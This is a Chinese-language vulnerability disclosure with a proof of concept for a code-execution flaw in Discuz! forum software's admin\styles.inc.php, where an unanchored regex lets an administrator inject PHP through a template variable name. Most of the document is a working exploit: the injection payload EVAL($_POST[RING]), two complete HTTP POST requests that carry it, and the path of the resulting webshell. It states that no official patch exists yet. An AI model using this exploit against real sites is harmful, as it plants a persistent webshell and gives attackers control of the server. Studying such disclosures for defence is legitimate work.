Discuz! admin\styles.inc.php get-webshell bug author: ring04h team:http://www.80vul.com 由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞. 一 分析 在文件admin\styles.inc.php里代码: if($newcvar && $newcsubst) { if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) { cpmsg('styles_edit_variable_duplicate', '', 'error'); } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) { cpmsg('styles_edit_variable_illegal', '', 'error'); } $newcvar = strtolower($newcvar); $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute) VALUES ('$id', '$newcvar', '$newcsubst')"); } 上面代码可以看出来当有后台权限时,可通过编辑风格,自定义模板变量处插入 !','80VUL');EVAL($_POST[RING]);// 替换出插入 exp by ring04h!,远程写入webshell执行代码. 二 利用 POC: step1: POST /bbs/admincp.php?action=styles HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.80vul.com/bbs/admincp.php?action=styles Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: www.80vul.com Content-Length: 154 Connection: Keep-Alive Cache-Control: no-cache Cookie: formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB step2: POST /bbs/admincp.php?action=styles&operation=edit&id=6 HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: www.80vul.com Content-Length: 1402 Connection: Keep-Alive Cache-Control: no-cache Cookie: formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB webshell: http://www.80vul.com/bbs/forumdata/cache/style_6.php 三 补丁[fix] 该漏洞已提交,等待官方补丁.